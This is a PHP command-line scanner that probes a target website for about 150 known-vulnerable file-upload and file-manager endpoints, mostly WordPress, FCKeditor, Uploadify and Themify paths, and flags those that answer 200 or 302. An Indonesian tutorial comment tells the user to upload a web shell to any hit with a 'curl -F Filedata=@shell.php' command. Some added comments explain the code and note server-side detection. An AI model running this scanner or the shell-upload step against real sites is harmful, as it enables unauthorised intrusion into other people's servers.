- <?php
- //AUTHOR | AZZATSSINS
- // CLI helper that writes a fixed list of upload/file-manager paths to
- // vulnlist.txt, reads one base URL from stdin and HEAD-requests every path
- // on that host, reporting the HTTP status of each. Every PHP diagnostic is
- // silenced below, so a failed fopen() or a connection error never surfaces;
- // in the probe loop a transport failure is only visible as HTTP code 0.
- @error_reporting(0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @ini_set('log_errors',0);
- /*
- Simple tutor : pertama run script (php afu.php) , kmudian masukan site target (dg http://), trus scan, jika ada yang vuln (hijau), copas full urlnya, trus exec via curl ( curl -F postfile="@shellmu.php" url) cth: curl -F Filedata="@shell.php" http://azzatssins.int/vuln/upload.php
- */
- // Seed the probe list. Mode "w" truncates any existing vulnlist.txt, the
- // handle returned by fopen() is never fclose()d, and neither fopen()'s nor
- // fwrite()'s return value is checked (with error reporting off, a failure
- // here is silent and the read further down then operates on an empty file).
- fwrite(fopen("vulnlist.txt","w"),"/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
- /wp-content/plugins/1-flash-gallery/upload.php
- /wp-content/themes/zcool-like/uploadify.php
- /third-party/uploadify/uploadify.php
- /lib/uploadify/custom.php
- /wp-content/plugins/html5avmanager/lib/uploadify/custom.php
- /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
- /wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php
- /wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php
- /wp-content/themes/aim-theme/lib/js/old/uploadify.php
- /wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php
- /wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php
- /wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php
- /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php
- /wp-content/plugins/comments_plugin/uploadify/uploadify.php
- /wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php
- /wp-content/plugins/doptg/libraries/php/uploadify.php
- /wp-content/plugins/pods/js/uploadify.php
- /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
- /wp-content/plugins/qr-color-code-generator-basic/QR-Color-Code-Generator/uploadify/uploadify.php
- /wp-content/plugins/wp-symposium/uploadify/uploadify.php
- /wp-content/plugins/uploader/uploadify.php
- /wp-content/plugins/uploadify/includes/process_upload.php
- /wp-content/plugins/very-simple-post-images/uploadify/uploadify.php
- /fileman/
- /ckeditor/fileman/
- /ckeditor/plugins/fileman/
- /RoxyFileman/fileman/
- /assets/fileman/
- /wp-content/plugins/ckeditor-for-wordpress/includes/upload.php
- /fckeditor/editor/filemanager/browser/upload/php/upload.php
- /assets/backend/ckeditor/kcfinder/?ckact:upload
- /FCKeditor/editor/filemanager/upload/test.html
- /fckeditor/editor/filemanager/connectors/upload.php?Type=File
- /plugins/p_fckeditor/ckeditor/plugins/filemanager/
- /ckeditor/ckfinder/ckfinder.html?Type=Files
- /ckeditor/ckfinder/ckfinder.html?Type=Images
- /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
- /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/frmupload.html
- /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html
- /wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html
- /wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
- /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html
- /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html
- /wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
- /wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
- /wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
- /admin/fckeditor/editor/filemanager/upload/test.html
- /admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
- /FCKeditor/editor/filemanager/connectors/test.html
- /system/fckeditor/editor/filemanager/browser/default/connectors/test.html
- /FCKeditor/_samples/asp/sample01.asp
- /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
- /mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html
- /mambots/editors/fckeditor/editor/filemanager/connectors/uploadtest.html
- /ckeditor/samples/plugins/htmlwriter/outputhtml.html
- /wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
- /wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
- /wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
- /wp-content/plugins/mac-dock-gallery/upload-file.php
- /wp-content/themes/kernel-theme/functions/upload-handler.php
- /wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php
- /wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
- /wp-content/plugins/dzs-zoomsounds/admin/upload.php
- /wp-content/themes/dandelion/functions/upload-handler.php
- /wp-content/plugins/wordpress-member-private-conversation/doupload.php
- /wp-content/themes/Elemin/themify/themify-ajax.php?upload=1
- /wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1
- /wp-content/themes/Tisa/themify/themify-ajax.php?upload=1
- /wp-content/themes/Funki/themify/themify-ajax.php?upload=1
- /wp-content/themes/Pinboard/themify/themify-ajax.php?upload=1
- /wp-content/themes/Folo/themify/themify-ajax.php?upload=1
- /wp-content/themes/grido/themify/themify-ajax.php?upload=1
- /wp-content/themes/Suco/themify/themify-ajax.php?upload=1
- /wp-content/themes/iThemes2/themify/themify-ajax.php?upload=1
- /wp-content/themes/fullpane/themify/themify-ajax.php?upload=1
- /wp-content/themes/simfo/themify/themify-ajax.php?upload=1
- /wp-content/themes/rezo/themify/themify-ajax.php?upload=1
- /wp-content/themes/bizco/themify/themify-ajax.php?upload=1
- /wp-content/themes/minshop/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-landing/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-elegant/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-base/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-corporate/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-music/themify/themify-ajax.php?upload=1
- /wp-content/themes/postline/themify/themify-ajax.php?upload=1
- /wp-content/themes/newbasic/themify/themify-ajax.php?upload=1
- /wp-content/plugins/viral-optins/api/uploader/file-uploader.php
- /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
- /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
- /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
- /wp-content/themes/honestkim/js/redactor/demo/scripts/file_upload.php
- /wp-content/plugins/html5avmanager/lib/uploadify/custom.php
- /cms/HTMLEditor/editor/filemanager/connectors/test.html
- /CMS/HTMLEditor/editor/filemanager/connectors/test.html
- /Editor/editor/filemanager/upload/test.html
- /admin/templates/fckeditor/editor/filemanager/upload/test.html
- /javascripts/fckeditor/editor/filemanager/connectors/test.html
- /admin/htmleditor/editor/filemanager/connectors/test.html
- /admin/classes/components/formattedTextArea/fckeditor/editor/filemanager/browser/default/frmupload.html
- /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
- /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html
- /wp-content/themes/famous/megaframe/megapanel/inc/upload.php
- /wp-content/plugins/lim4wp/includes/upload.php
- /wp-content/plugins/arcadepress/php/upload.php
- /wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php
- /wp-content/themes/photocrati-theme/admin/upload_edit.php
- /wp-content/plugins/custom-background/uploadify/uploadify.php
- /wp-content/plugins/placester/js/uploadify/uploadify.php
- /wp-content/plugins/custom-content-type-manager/upload_form.php
- /wp-content/plugins/drag-drop-file-uploader/dnd-upload.php
- /wp-content/plugins/mac-dock-gallery/upload-file.php
- /wp-content/plugins/foxypress/uploadify/uploadify.php
- /wp-content/plugins/asset-manager/upload.php
- /wp-content/plugins/font-uploader/font-upload.php
- /wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
- /wp-content/plugins/gallery-plugin/upload/php.php
- /wp-content/plugins/front-end-upload/upload.php
- /wp-content/plugins/omni-secure-files/plupload/examples/upload.php
- /wp-content/plugins/wpstorecart/php/upload.php
- /wp-content/plugins/image-gallery-with-slideshow/upload-file.php
- /elFinder/php/connector.php
- /_file-manager/php/connector.php
- /assets/php/connector.php
- /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
- /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
- /index.php?option=com_jdownloads&Itemid=0&view=upload
- /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
- /js/webforms/upload/
- /modules/simpleslideshow/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/attributewizardpro/file_upload.php
- /modules/vtemslideshow/uploadimage.php
- /modules/blocktestimonial/addtestimonial.php
- /ajax/api/hook/decodeArguments?arguments=
- /elearningku/proses.php?pilih=guru&untukdi=upload");
- // ANSI-coloured banner; the escape sequences assume a terminal that honours them.
- print "\e[34m ___ ________ ___ ___________________ ______
- / _ /_ /_ / / _ /_ __/ __/ __/ _/ |/ / __/
- / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ // /\ \
- /_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/
- ";
- echo "\e[93m\n#######AFU FINDER BY AZZATSSINS######\n";
- // Base URL is taken verbatim from stdin (only trimmed); nothing checks that it
- // carries a scheme or is well-formed, so a bad value just yields HTTP code 0 below.
- echo "\nInput URL : "; $target=trim(fgets(STDIN));
- // One probe path per line of the list written at the top of the script.
- $page=explode("\n", file_get_contents('vulnlist.txt'));
- foreach($page as $lol) {
- $cyberserkers=$target."/".$lol;
- $ch=curl_init($cyberserkers);
- // HEAD request only (CURLOPT_NOBODY). Redirects are not followed, so a 302 is
- // observed directly rather than resolved to its final status.
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- // CURLINFO_HTTP_CODE is 0 when no HTTP response was received at all.
- $azzatssins=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- // The status code alone decides the verdict: 200 and 302 are flagged as
- // candidates, everything else is printed as a miss. A 200 from a catch-all
- // route or a 302 to a login page is therefore a false positive. From the
- // server side this run is a rapid series of HEAD requests for these paths from
- // one client; an endpoint that genuinely answers 200 should be checked for
- // authentication and file-type enforcement, or removed if unused.
- if($azzatssins==200){
- echo "\e[92m \n>> ". $cyberserkers." [Check it > Status 200 OK]";
- }elseif($azzatssins==302){
- echo "\e[92m \n>> ". $cyberserkers." [Check it > Status 302 Found]";
- }else{
- echo "\e[91m \n". $cyberserkers." ( ".$azzatssins." )\n";
- }}